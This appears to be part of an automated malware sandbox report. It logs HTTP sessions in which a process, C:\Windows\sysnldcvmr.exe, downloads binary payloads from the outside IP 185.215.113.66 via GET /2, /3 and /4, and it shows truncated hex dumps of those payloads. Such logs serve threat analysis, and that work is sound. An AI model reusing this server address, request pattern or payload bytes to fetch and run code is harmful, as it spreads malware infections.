                                                                                                                  Nov 30, 2024 01:56:00.283493996 CET124INData Raw: 93 57 98 e3 4c ac 64 50 69 d5 5e 60 5a 42 6a 17 d0 32 d7 d9 a3 9b b5 09 7a 01 5c d5 9a f5 b4 51 04 76 c6 6d 7e 0d de 69 d1 63 ff bd c2 b8 2c 86 13 5e 38 49 df c1 51 01 c0 d9 12 0c ba 3d d0 82 60 7b 3d ce 3a 38 e6 8c dc 07 d6 cd 79 a1 7c 5e 57 03
                                                                                                                  Data Ascii: WLdPi^`ZBj2z\Qvm~ic,^8IQ=`{=:8y|^WaO".m).=WP~TE
                                                                                                                  Nov 30, 2024 01:56:00.283718109 CET1236INData Raw: 4c 42 63 2a 88 24 37 be 0d 52 6c ca 2d 11 74 6a 4f 1c 96 52 71 18 29 06 58 2e ed 84 4a d6 69 35 40 34 36 fa a4 03 08 6e 3d cc 79 d5 da 9b cd e5 49 62 a0 15 b7 25 90 b3 49 fd 19 9c 00 1d 6e be 47 6c 88 53 1f 7a bc b7 33 91 33 28 07 fa a3 3a 26 01
                                                                                                                  Data Ascii: LBc*$7Rl-tjORq)X.Ji5@46n=yIb%InGlSz33(:&eGco%bA;0=X^tiIIsnc:F&lU'/xJQHI9xJ :6A@dq"0o3zC4/mqM#~Ei
                                                                                                                  Nov 30, 2024 01:56:00.283914089 CET1236INData Raw: 93 d9 75 84 fb 01 3a 8d e5 b7 91 3a 76 75 6b d3 6c a6 b9 fe a4 2f 47 5e 75 68 33 a0 76 87 6a 1a b3 ec d4 d7 f1 a1 5a c1 ff 30 43 2c 25 b0 ea 1e 1b 51 9d 20 86 8b df 35 f9 6d 0b 1e 79 38 0d bc 65 b9 0b 84 27 d9 2b 6f f9 7b 17 0e af 44 b6 38 8a 0b
                                                                                                                  Data Ascii: u::vukl/G^uh3vjZ0C,%Q 5my8e'+o{D82.p/{hp'SS/g)WJ4)`&a0oc]Uo(4M'_sG@mxy6("S9%5]9[h1_&},fOnN
                                                                                                                  Nov 30, 2024 01:56:00.283942938 CET248INData Raw: 7b 26 54 bb 8f 3b 49 5d 85 8d ef 23 d3 03 bf d7 a3 12 7a 16 b2 c0 04 d2 f8 59 ed 93 77 a1 9b 16 eb 38 08 4f 1f f3 41 a0 7b 13 e5 00 b1 6b dd 19 4b ed c5 fb 8c e7 26 47 0f 46 fb 4d 58 09 99 98 14 46 4a 2b a4 8e 49 0f b4 a7 97 24 3f bd 72 2d 3a 50
                                                                                                                  Data Ascii: {&T;I]#zYw8OA{kK&GFMXFJ+I$?r-:Pw_gN/6p"]c{1 NTSgA7|I5Y&hOhAcUz(S7S})!s%F'GWfS\D5LR)r9X+%
                                                                                                                  Nov 30, 2024 01:56:00.284507036 CET1236INData Raw: 89 71 be 79 12 82 18 46 ac a6 88 ba 3d 5a 96 af 3f a5 ef 1f e9 da 21 18 33 69 f5 e3 08 b7 9c 52 4d 92 10 87 70 e8 6c 0e e9 14 c4 c1 93 a8 2f 42 72 dd 86 d8 05 a9 18 6c fe 42 37 2d 2a 59 74 3b 7c 72 a6 7f bc 53 8f 84 17 e1 ce b6 df 7b 2e cc fe ad
                                                                                                                  Data Ascii: qyF=Z?!3iRMpl/BrlB7-*Yt;|rS{.gdfow%f.tBH{:Ba{%dPL(Q6V>m:p@Nx!I EKJ*{s`#UWr|Df~Y:<@c?-G
                                                                                                                  Nov 30, 2024 01:56:00.284706116 CET1236INData Raw: b8 f9 77 31 77 35 65 64 c5 bb ba 51 07 10 a4 ce 44 d9 db b7 71 e2 b5 48 ee fa 05 91 3d 1b c9 c6 91 2e ff f0 a9 7e 6f 84 73 ba 58 6f e7 75 df 92 c7 48 7f c8 65 50 e5 64 b8 74 ba 6e 71 60 59 36 47 34 c4 89 40 bc 81 34 47 fe 22 ff eb 45 4c 97 ef 2a
                                                                                                                  Data Ascii: w1w5edQDqH=.~osXouHePdtnq`Y6G4@4G"EL*-D$hOYCMt;Eby;tQfqV{#btFGqNPs%#@#&AG =OPp*uLx!$A<k_xmO1>
                                                                                                                  Nov 30, 2024 01:56:00.284734011 CET248INData Raw: c7 16 06 88 4f a6 d0 e2 07 16 8f d1 6f 4f ed 61 fd 2f f4 a0 9c 03 da 7f 60 b3 09 01 fb 75 30 18 7f f9 60 5d c4 9a c2 7e 36 ce f1 82 6c 67 ab 4d 68 f2 77 f9 52 c2 4f fa a0 61 6b e3 3a e6 0e 25 78 4e 3b a3 59 5d 02 e8 e2 07 c4 08 44 69 97 04 49 86
                                                                                                                  Data Ascii: OoOa/`u0`]~6lgMhwROak:%xN;Y]DiIYj`i@gnK= {}7NWSC"$Z^"Ld($]8,C"e0+Y_%}a\w_ra=N.>e@b#T\@A$FM.1
                                                                                                                  Nov 30, 2024 01:56:00.285187960 CET1236INData Raw: 79 e0 10 dc 1e 09 05 37 4a 4b 50 68 04 09 8c bf 03 d1 17 2c 32 57 3e c1 e9 3e 7b b2 a3 5d 10 95 a7 74 b6 bd fe c6 c9 12 03 83 34 fd 15 69 cf c8 fe 55 b2 ed 61 ec 41 49 bc 64 a0 42 b3 ac 4a 85 83 00 2b 3a 92 4f 22 46 0c 37 26 dd da 56 a0 6e 23 a9
                                                                                                                  Data Ascii: y7JKPh,2W>>{]t4iUaAIdBJ+:O"F7&Vn#Rj*$.z"Wt,qNh"1=3Ib:Y!\fsAF),l;mN|#{S?&P<G5IjYWY>q+fL~W5GXPY?ECjZ@
                                                                                                                  Nov 30, 2024 01:56:00.285368919 CET1188INData Raw: 70 91 81 19 2c 59 8e f1 0a af 73 c4 90 b3 45 dd f9 e2 6e 1b 38 f2 81 c3 da ee d3 fd 57 21 09 ae 12 41 32 4f 75 e6 60 0d 48 d7 82 a7 f1 a9 30 77 2e f3 7a c7 2b ff f9 56 6a 32 57 ca bd 80 37 72 35 81 48 51 9e 7f a7 92 f4 bf ff de 88 c8 93 ee e2 5d
                                                                                                                  Data Ascii: p,YsEn8W!A2Ou`H0w.z+Vj2W7r5HQ]Q(3j?vK={,m@^1?vHl6=Nke&u+bIB`#0s']B4/8>XuP_Q@(^OS$&


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  12192.168.2.449771185.215.113.66801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:56:02.467327118 CET166OUTGET /2 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:03.800020933 CET1236INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:56:03 GMT
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Length: 10496
                                                                                                                  Last-Modified: Sun, 20 Oct 2024 18:34:00 GMT
                                                                                                                  Connection: keep-alive
                                                                                                                  ETag: "67154d18-2900"
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Data Raw: 13 e3 aa 7c f1 40 76 43 29 84 09 02 71 ae 39 fc df 9d fa 02 4b d8 7b 3e ae 0c e2 64 38 f9 d3 27 da 73 10 d1 ca f9 f2 4a f8 ad aa 12 e8 fa c9 50 6e f5 a1 6b 88 56 c2 7a 1f 17 e8 40 57 00 b2 8f df 4c 7b e3 14 75 47 bf 27 47 31 bb 43 4c 8e e7 b4 40 14 db 1d 3c 42 cc e1 36 dc d3 3b 91 3e 68 4d 15 e2 5c e6 98 da 7c 77 03 42 8c 76 ca a5 9a 81 db a1 ec 75 f2 84 a2 67 09 f0 c5 b4 4f 58 86 25 fc 20 b3 68 fa 72 39 3a 7c e0 1b f5 e8 b0 73 b6 f8 3c 81 36 fa 29 81 67 e8 ee 34 47 6c 59 b9 7f 18 32 42 66 14 35 b3 8d e2 41 8d e5 92 2b 47 1f c0 93 b3 28 d8 54 2d 6f 45 f1 c3 5a cf 49 32 33 d3 7b ac a8 27 33 c1 c9 e0 29 60 f9 b3 d3 5e 65 37 6a 7a 2f 4d 24 73 1b 93 bb fa 91 d2 34 ce 9b 19 db d6 2a 31 36 f0 a2 ab 92 6d 08 d9 66 72 6e 07 c5 44 44 2c 9e af ae ce d3 fb 57 61 28 cd 32 90 44 0e c3 39 95 a9 ab 17 e4 0d 16 a5 f0 c2 e3 78 c3 de e1 fa ff 86 d7 ae ab 06 ba 5a 6b 34 44 61 15 d3 b1 85 29 3f 83 f4 5f 68 10 ed 8d d7 73 41 11 b6 57 f3 ed 02 fa a4 42 32 ff 99 d6 ea 0a 63 48 51 ba 54 b5 00 01 83 3d 9e bb 55 dd 93 1c e5 [TRUNCATED]
                                                                                                                  Data Ascii: |@vC)q9K{>d8'sJPnkVz@WL{uG'G1CL@<B6;>hM\|wBvugOX% hr9:|s<6)g4GlY2Bf5A+G(T-oEZI23{'3)`^e7jz/M$s4*16mfrnDD,Wa(2D9xZk4Da)?_hsAWB2cHQT=U@3}!YGCX{ 4"&h0.'xu#c|gL0)cM]oL{:En:?|_XPQ@ 3.o)ua[I+fZM% ]2uz_Gwt0bFaMTd2Y&TMXP}+OpQEo6R;P>8`2'"~CZ_,2g $l"x:h;H`$-6_-eC?6T=qL3&fG)WG@6X~%X%RCh?R].fbU!PHh"Rj,dk.e\~hn(,G<u16tlw;p;yrSC_M6XhtG7zsHP,e_ddcn^M+ct\0jr>;_nq>xezw
                                                                                                                  Nov 30, 2024 01:56:03.800154924 CET1236INData Raw: b6 6f 0a 0a 83 25 6b 6b 77 fa e4 46 67 eb d9 41 2f aa 63 53 82 83 51 d9 2f 3d 63 6a 82 33 0b 6f 95 13 e1 9f 36 1b ba cb fb f5 6f 57 bb 40 bd 1d a5 c1 57 98 12 18 b1 98 2c ff 21 39 d5 d8 8c 8b 48 74 d5 8a 79 fc c5 75 bb aa e4 d3 c1 a0 97 29 d7 96
                                                                                                                  Data Ascii: o%kkwFgA/cSQ/=cj3o6oW@W,!9Htyu)PU:vO'8O>*B aw'&iEpRaMZ|3Fk<lQ;GbPMlh5}8m;ajW,N7&QK
                                                                                                                  Nov 30, 2024 01:56:03.800168991 CET1236INData Raw: 63 34 74 b5 c2 9f e6 cf 24 40 6d 6d 39 94 34 21 a1 59 32 49 93 8d 45 6f 16 41 e3 3e fb e9 ec 01 f9 89 40 75 7d 84 c1 29 99 2e 8f f9 01 1b d7 e2 f5 ea f5 37 7e 95 c0 87 7f d4 e2 e3 b8 2c a3 95 7b 43 15 a1 69 fe 92 c8 13 e2 7f 5f 3b 68 4b fa 25 e1
                                                                                                                  Data Ascii: c4t$@mm94!Y2IEoA>@u}).7~,{Ci_;hK%D&kuY'p=/a:NTtKu"1X[8Ibdym-*|+>a`<Z!%| 4&[+usL^etpuu);Xb<>M\
                                                                                                                  Nov 30, 2024 01:56:03.800626040 CET1236INData Raw: 0b a6 7d 79 c6 0e 19 41 de 44 a9 03 74 f2 fb a9 92 bc 27 b6 69 9d 42 1a 59 26 6e 6d a8 df 05 cd 7b e6 9c e9 45 0f 67 74 bc 1a e1 59 dd 58 26 67 a8 cb ea 52 87 27 f1 9b fe 95 bd 52 bf 68 3a 2f 74 d5 bc 82 48 3c f6 ef 52 41 bf 9a 2d b2 e4 48 3f 02
                                                                                                                  Data Ascii: }yADt'iBY&nm{EgtYX&gR'Rh:/tH<RA-H?:3a$8;SU*rN1QIuc>"W|1Rrm]T1&PSTQZqEtgc[U*,@+LoR0rMwfu^VUzcie_$eM;B
                                                                                                                  Nov 30, 2024 01:56:03.800637960 CET1236INData Raw: 0e 0b 73 b4 cc 61 72 90 49 03 c9 0c 34 6e 73 ed 3b 3f 45 e7 2a 84 8c 3b 11 6d 21 89 00 60 23 47 8c c2 4b 9e c0 2c d8 47 80 38 fd e5 6a f8 e1 31 10 55 0b 54 d4 89 df 1b da 0d 24 5b 6e ee 18 45 4b 11 59 49 7e 62 cf 22 93 99 ab 6f bd b6 fe 39 0b 36
                                                                                                                  Data Ascii: sarI4ns;?E*;m!`#GK,G8j1UT$[nEKYI~b"o96{'#S(cJK4*Hft5U>1uauV|p8"`;uT;_Ibmppc&D5HCwjrH&532a`#&A
                                                                                                                  Nov 30, 2024 01:56:03.800648928 CET1236INData Raw: 52 57 11 8b 24 3e 89 1b 44 e8 11 27 36 d3 98 6c 64 5f c1 5e 36 d1 aa 50 5a 3a 84 e5 9f 20 97 64 a4 c0 4b 41 9b fa 0a f4 83 09 e0 69 91 cf e7 2c d4 09 d5 e4 18 60 53 3c 4e cb 83 5e 89 f8 2f 97 1b db be 93 32 73 f7 8d f7 65 6f 24 ee f6 74 d5 08 d2
                                                                                                                  Data Ascii: RW$>D'6ld_^6PZ: dKAi,`S<N^/2seo$tRu@.\]=/E,PX<yu6CIEF`!Ue$u9r;SwjF"dDxsWY/"4|bob`|bS
                                                                                                                  Nov 30, 2024 01:56:03.801363945 CET1236INData Raw: b5 f2 e5 56 94 d5 a7 ba 2e 4b ef 19 cb 34 b8 a7 99 e1 80 8c cc c0 91 a1 56 e3 29 95 04 e6 0f b9 a5 86 93 81 fe fb 19 09 f6 66 dc 6a 30 a9 58 e4 78 2d 5f 4e 45 b3 14 af 02 96 da 20 60 39 3e 4b 48 c0 80 cb 76 02 0b 8c c1 87 09 1a bc 98 6d 65 18 af
                                                                                                                  Data Ascii: V.K4V)fj0Xx-_NE `9>KHvme#R]/I{J4],GCrJZ3;:U$=%W&^/UR1i [kkRh1;Cz^DO"j$qQT`r!Q[(7_`E
                                                                                                                  Nov 30, 2024 01:56:03.801378965 CET1236INData Raw: 28 11 af e2 41 9b fa 51 e9 ab d8 2a 79 da ce 15 40 37 b8 70 18 de 0f 5b 95 e6 1e b5 38 1d 61 99 66 96 eb c4 00 1f 65 72 58 fc 2e 42 79 8e 29 b8 e0 15 7b 9e 33 1a 0b 8c e5 49 8f 3e 92 cc 6d 67 59 91 10 68 27 3e 93 f3 d5 fa 1d e9 90 99 e6 46 67 f1
                                                                                                                  Data Ascii: (AQ*y@7p[8aferX.By){3I>mgYh'>Fg),},([vUl s?u/AsGbrRbV1oLE?fpK`|cv\}0>jmer^kvrM5uMW~c3FzWSkUM@q
                                                                                                                  Nov 30, 2024 01:56:03.801388025 CET873INData Raw: b7 1b ed 55 22 52 87 a3 c5 38 9f b8 98 95 ff b4 f2 c4 e9 dd 2d 0b 3c 5d 3d 5e 30 5e fd c6 f8 54 b4 2a e8 93 3d a8 1f 7d 5c e5 4d 1d c9 7e cb 06 5c 4c 2c 00 33 bd 10 e0 11 48 3b 01 7b 52 15 1a d2 67 2c a4 26 fc e8 3f 86 7e 08 4f 27 64 b0 a6 1b 25
                                                                                                                  Data Ascii: U"R8-<]=^0^T*=}\M~\L,3H;{Rg,&?~O'd%`dJU]~Y:|2Jd-\ Q@n\|{hYc$P;.s^X"@Nn>$2Y+J@Y},?r`41RmU\gd


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  13192.168.2.449777185.215.113.66801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:56:06.038530111 CET166OUTGET /3 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:07.426220894 CET1236INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:56:07 GMT
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Length: 63232
                                                                                                                  Last-Modified: Fri, 29 Nov 2024 08:44:56 GMT
                                                                                                                  Connection: keep-alive
                                                                                                                  ETag: "67497f08-f700"
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Data Raw: 33 f7 8b 96 d4 1c c5 f7 02 2d 3b f9 29 56 f5 f4 d6 d1 ab 1d a3 07 e3 94 06 db 98 58 8f a8 15 fd 7f 2a 5c a2 5a 7f 5e 53 dd 1e fd e9 2c 6e ac ad 71 ea 1a b3 2e 68 a2 20 49 ea a8 e0 84 a0 ef a9 83 65 db 9d c7 bf e1 92 3b 5a 7a b1 38 27 e1 0e b1 ad 9d 34 46 80 b2 41 72 1e b0 61 3d 58 04 36 4f 34 af 33 66 98 c3 62 e4 2d ff 5c 75 75 f3 20 e7 79 37 9b 19 b5 17 a2 ce 84 0a ad d0 c6 8c 15 30 70 5c 6b c4 92 aa 2c 95 d8 e3 b8 4e 58 6e 38 a5 ae f3 d7 30 b0 d0 18 34 65 f2 a6 49 88 07 9f 4f f7 44 af 44 64 61 ed de 19 46 71 f9 82 32 a3 5f 55 4f 88 b3 af c3 b3 37 c2 77 a2 6b 03 99 84 a0 97 c7 fa 4e 6c 85 2e d1 c9 a0 c9 63 48 9a bc 6b 3d 82 6b 52 64 94 fb 2d 30 37 3c af 78 bb d8 61 5c a1 84 19 88 fb e8 59 e6 d1 32 4a 01 8b ed 59 ef 69 92 b3 3f f8 1c ef 81 73 9a c2 56 62 00 68 5c ee ab 06 14 2f 08 27 10 3d f9 3b 0f 17 a5 5f 99 05 c8 b2 9b 39 e6 7f 4d c9 53 2a b9 8d 3b d9 b9 66 cd d5 f0 d9 d8 1f a6 78 8f 3b 7b 6c c2 42 40 2c b3 8b 4c e3 46 03 3f a4 77 00 31 00 62 2e 43 56 7d d7 90 dd c5 c5 37 b1 d9 e9 3d 04 fc 73 2f [TRUNCATED]
                                                                                                                  Data Ascii: 3-;)VX*\Z^S,nq.h Ie;Zz8'4FAra=X6O43fb-\uu y70p\k,NXn804eIODDdaFq2_UO7wkNl.cHk=kRd-07<xa\Y2JYi?sVbh\/'=;_9MS*;fx;{lB@,LF?w1b.CV}7=s/pQ[Gm+P3]1Y[)e=t|*wOQ;}GF:m k'h:rgrM$wygS^`3s^Ye2554KJL!.j^R4o6g?{x}iX1?rW-m4v&n%l:_yNauT}T!V9DKLM9#,f\c^870(7AVB4sy.mE$IRHF'!,a's\$qHV[*9RSrzKI74HyNtnC wY8Ih6;>EDbyEWIchP&="1".'R;a_-Uy/24(suQyGO8`)u3g9lW2(P>2^'r{g_!0i-(bgT?JfilC2`-N=TM[
                                                                                                                  Nov 30, 2024 01:56:07.426265955 CET124INData Raw: a9 e4 31 7f 61 96 d8 96 40 d0 9f 93 a5 20 8b 23 6f 3b cb 14 d6 52 f3 60 5f 88 a5 fd a6 7c 23 ca 95 7c 9b 98 8a dc 48 a2 ce 25 dd e3 81 30 53 09 1d 48 b4 39 7e ba 60 9d a5 86 b9 61 f6 17 af 61 2d e9 06 e3 ef ad 31 67 8c 1b 48 29 32 bf dc ac 73 0d
                                                                                                                  Data Ascii: 1a@ #o;R`_|#|H%0SH9~`aa-1gH)2sLGnc <k[63
                                                                                                                  Nov 30, 2024 01:56:07.426625967 CET1236INData Raw: d3 d3 c0 0b 8a 7f b8 97 4e 22 4f ca 14 06 f0 a4 fe ab cc ab ac 94 22 41 1c 65 72 b1 a1 b5 80 5e 31 c0 cd f5 46 7f 2e a6 44 0d c3 f3 5b 60 96 13 5c 9d b4 83 4f f6 f0 35 44 7d 2b ea 99 13 61 4c 2e 41 60 a3 15 7d 34 29 77 78 23 0f 30 4a ae 21 f3 ba
                                                                                                                  Data Ascii: N"O"Aer^1F.D[`\O5D}+aL.A`}4)wx#0J!8{(dw!DJ;hz|dNz=5%xuA~P{m2[Nz"Nz/`nO!|I7XL!z?K3GB&CPXL_6<$v!afZ96*.3
                                                                                                                  Nov 30, 2024 01:56:07.426785946 CET1236INData Raw: 2c 88 74 8b b7 76 62 a3 c9 c5 27 d0 2a 27 5c 3d 75 89 75 b6 08 e3 64 b7 af 9f 42 79 11 1c 3a 2f e8 fa 1f 02 ca 7a 20 84 ab 43 6c 66 1d 11 79 ac b5 00 76 a0 c4 46 b4 fc 34 6f d3 2b 57 54 fd 5a a7 ba 6a 03 af 6d 51 1f 49 41 51 5f 04 c7 8a c5 5b a2
                                                                                                                  Data Ascii: ,tvb'*'\=uudBy:/z ClfyvF4o+WTZjmQIAQ_[cg=8a;-t94g!]rG.sM=Is$aZt&ID. MzL2V7*QIu;5f;kIB*w%zH-L=_k_/i
                                                                                                                  Nov 30, 2024 01:56:07.426795006 CET248INData Raw: 7a fe 71 03 99 6d 41 8c fb 0c b8 8a 45 80 8e 7f ee d8 c3 f9 c4 c0 8c 7f b4 fd 48 e2 80 d4 a2 0b e7 83 a2 eb b5 e0 d3 1c 9b c2 5d 36 a2 1a fd fc b3 74 e2 3a 01 a3 46 ae f8 b7 c7 f6 76 71 10 6c 44 90 f8 85 c7 d1 11 19 b7 46 54 d6 b3 fe b3 a2 7c 9a
                                                                                                                  Data Ascii: zqmAEH]6t:FvqlDFT|JG9_,l{!G6eMqP_dUxqZI^lxA`_}Kc7aRk/;V)(9!U}hs0{TMuVZ1_7<zjv3
                                                                                                                  Nov 30, 2024 01:56:07.427334070 CET1236INData Raw: fc 04 b1 a3 61 a9 3e e9 b8 4f 99 39 08 9c 69 da 46 18 36 3a 4b 73 dc 66 d7 fd c6 fb 18 c4 f0 71 ec dd 69 3d 4e 7f d9 ab 61 42 45 69 3f 09 c2 f8 94 ed f4 9a d9 59 30 4f 65 5b 90 4f 6d 9a d5 80 e7 09 b9 42 31 f9 9c c9 1a 0a 46 5f a8 4d 51 63 eb a7
                                                                                                                  Data Ascii: a>O9iF6:Ksfqi=NaBEi?Y0Oe[OmB1F_MQc ~)sWh7z4>(our*Q< M9K=2B[,/+?~gg).L{A]rbAx=p5KZ;ZrZ_f5dQUe
                                                                                                                  Nov 30, 2024 01:56:07.427501917 CET1236INData Raw: c7 b6 4a 74 d2 29 ae 30 5a 13 0d c5 bd ad 85 62 e6 41 ba 2c db e4 33 17 af 92 97 e8 c2 50 6f d3 93 2b 1a d9 ef c8 8c ad 28 76 b1 0a 03 22 aa a4 9d d6 19 b7 f4 a3 21 68 33 93 55 49 99 92 85 49 83 f2 c1 f7 84 ba 94 17 67 0a b6 68 7c b3 3e 5f 83 de
                                                                                                                  Data Ascii: Jt)0ZbA,3Po+(v"!h3UIIgh|>_C+]`OG3de{tlnAj}xAD|kH9GV^zmT{y;c}w3pRy<V=5a=dUYW-XW>1-2$i00*vq=,P
                                                                                                                  Nov 30, 2024 01:56:07.427510977 CET248INData Raw: 4d 81 90 a2 d9 c9 ea 87 af e7 54 a4 00 ee 8f 86 4d 10 1b 06 cf bd 41 22 9f f2 47 09 3b 4c 20 17 59 91 37 2b c7 68 ae 66 7e 0f 1e 64 ca 7d 4d 56 36 9b 98 57 4e 5b 31 b4 bc 26 40 53 81 3d 1a 94 77 ce 40 60 b6 2c f1 68 f6 fc 84 5d 67 33 81 46 d2 a2
                                                                                                                  Data Ascii: MTMA"G;L Y7+hf~d}MV6WN[1&@S=w@`,h]g3Fq${:T;;hkRfjF7aC;@58Ht}uos(h/R#`qk1#a_Jx;JO)j <SmPC9P/ScTvD6>$Z
                                                                                                                  Nov 30, 2024 01:56:07.427840948 CET1236INData Raw: 4e 19 dd 3f ca 7c 76 56 25 cf d8 3b bc 0b cb e3 6b 61 d1 e8 74 ba 7b 9f f2 d9 3c 68 04 7d 8e 0f 0c b1 61 58 b2 89 2e a3 d7 a5 a6 67 de 63 77 82 29 21 e5 dc b8 b5 12 44 63 2f 26 6e 80 a8 59 93 9f f3 cb a5 38 f6 7d 47 18 0a fd 1a 10 c3 fc da 46 76
                                                                                                                  Data Ascii: N?|vV%;kat{<h}aX.gcw)!Dc/&nY8}GFvfnz)W'#vqDVkjGT$@o|fRdgFUVt't99#7><[CwN^>nxLWU63tuI-KS<9~
                                                                                                                  Nov 30, 2024 01:56:07.428071022 CET224INData Raw: e5 38 c4 33 36 b0 03 f5 cd c9 c0 30 b1 37 44 42 dc 55 49 55 be c3 68 9c 69 c1 11 97 33 09 f5 76 ba 2b 0b 44 51 96 3f 74 91 be 35 c3 11 5f 83 8f cf 2a 84 ec eb a0 7d 4e 67 ca 43 62 ca 3b 51 15 6c 2a 2d 10 a2 fa b7 6f fe 5b 39 e1 7d f2 d3 40 47 ee
                                                                                                                  Data Ascii: 83607DBUIUhi3v+DQ?t5_*}NgCb;Ql*-o[9}@Gg~@kk3;w=eZLp<0 X6Gj6b1T2<=dMp.t/>,7HD)a,Cs} %)CLX
                                                                                                                  Nov 30, 2024 01:56:07.546246052 CET1236INData Raw: e7 04 bb d8 a6 77 2c 64 ba 66 9c 9d 24 dd 46 3e 6b a0 01 d8 a7 97 a3 cd 6c 40 08 7f bd 99 79 4e 76 66 13 9f ed 99 25 16 b5 5b 97 a9 95 0f 07 b5 c3 1e 3b c1 99 4b 3d e0 1f 78 f1 22 4c 65 15 25 a3 1a 0b 21 3b 1b 08 c7 1b 53 df 34 54 83 64 8e 9b a0
                                                                                                                  Data Ascii: w,df$F>kl@yNvf%[;K=x"Le%!;S4Tda(W=#8Nirp:2AJrc0nt@51\3k!VJnUD6+/3=P~zxR.PTcJ&Um&=Z(l:mJik


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  14192.168.2.449789185.215.113.66801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:56:09.703958988 CET166OUTGET /4 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:11.086589098 CET1236INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:56:10 GMT
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Length: 55040
                                                                                                                  Last-Modified: Wed, 27 Nov 2024 12:44:32 GMT
                                                                                                                  Connection: keep-alive
                                                                                                                  ETag: "67471430-d700"
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Data Raw: a5 d1 27 01 80 df b4 90 f7 22 59 62 49 bd 72 10 5e 6c 42 5f 1c 89 9f 02 51 4d 78 3d 5e 77 28 5e cb 02 3a 58 3a c5 e0 84 da 2e 27 a6 19 84 4a 4f ee 08 33 84 cf 6b 04 b9 e1 3e 23 3e 89 7e fa 42 48 bc f9 b6 1e 73 91 7d 1f 65 ed a5 9a 66 26 40 c5 ff 74 8c 9d be 8a 65 1f 22 55 01 91 b5 68 4b 9a 48 57 10 d8 49 66 f1 5c 5d 98 bb 7c f8 41 87 54 8d 73 20 d1 5a c0 f4 bb 58 ad 46 80 bf 8b 88 96 66 f9 b3 b9 6c 03 e9 ac 53 0f 7e f4 90 e9 0b 3b ff 5f 10 92 6f fb 43 1d d2 b0 a7 96 02 e1 92 48 dc 16 5d e7 b9 11 2f a3 11 ba d4 06 8d 1b f8 90 b0 c0 2b ed 69 c6 3c bc 1e 69 d9 aa 13 bd d3 fc 63 04 97 ef 16 56 c3 bf 5c ec 7a 5f 20 33 b8 8c e6 b4 e8 48 e6 ec 7e 55 2c 56 17 55 9c 72 0a 50 65 41 b1 23 fc 0d 96 40 37 50 9a 83 06 ce 95 c0 60 4e 59 a0 5b 96 20 02 a5 2b 93 26 ea 8f 4e 19 b6 85 78 a4 7e 49 13 fd 9e 97 e4 aa 8f 81 01 9f 15 9d 90 f4 f4 a0 eb 9a a0 44 ba 98 14 42 87 ea ca fa 9a bf 1d a3 b3 b2 90 5c f6 14 db 1b 2f de 0f 92 6e c5 c2 28 2b 32 35 76 91 c5 36 98 6a c5 d0 4c b7 25 38 5c a0 5e 3f 5d 02 d4 1b be e7 00 ff [TRUNCATED]
                                                                                                                  Data Ascii: '"YbIr^lB_QMx=^w(^:X:.'JO3k>#>~BHs}ef&@te"UhKHWIf\]|ATs ZXFflS~;_oCH]/+i<icV\z_ 3H~U,VUrPeA#@7P`NY[ +&Nx~IDB\/n(+25v6jL%8\^?]xZI>ri[@s:p2yO6Q`L,h=8KLKZqaY=7"N5)/I&Os},D>)AS7rEpgsIuV`'A$]`\c3)xe.uW=Y"!-/if{":BKsWc%rW&dJ+g4a`2i=Pp*ks@?wCamFyN7y]Mg<.|smCvDO^_5NjX>,aF:S1xSgsP_z(FHOgZclxIq{.FQ=K3-kFI'~6eKLX 1:YO]S^mpkEbWXcF!wU4W]RHTcwkxbZm#&<r_Ee:gaP#_(3tjO
                                                                                                                  Nov 30, 2024 01:56:11.086607933 CET124INData Raw: bb 3b 85 b5 56 c5 2a c5 de 28 e1 3a dd 6f 3f 3a 35 2d 53 79 7e b4 92 56 8e 87 da 28 35 12 36 e0 18 20 92 8f 17 51 d3 85 ff ee 32 e6 b3 3f 49 46 e4 34 32 6f d5 de f6 12 6b d8 23 43 17 fb b0 d6 3e 12 29 ee 91 88 fe 40 dc 1e 83 38 56 54 9b 20 93 66
                                                                                                                  Data Ascii: ;V*(:o?:5-Sy~V(56 Q2?IF42ok#C>)@8VT f`:zd!UT&RNEBUNfy7
                                                                                                                  Nov 30, 2024 01:56:11.086853981 CET1236INData Raw: 69 ec 34 68 6c f0 51 19 4a 05 6f 5b f7 52 78 a6 e3 9e 5b 6e 40 c2 04 fc 67 d9 a2 55 35 36 51 a0 57 4f d4 14 8c 0a 2e 7c 79 44 de 45 8d 1e 2e 62 80 72 66 47 cc 59 3c e4 fe 4e d7 8b 45 24 3b ab 46 40 e5 d7 c4 0a bb fe b0 36 47 2a 32 72 ea 8f 88 2e
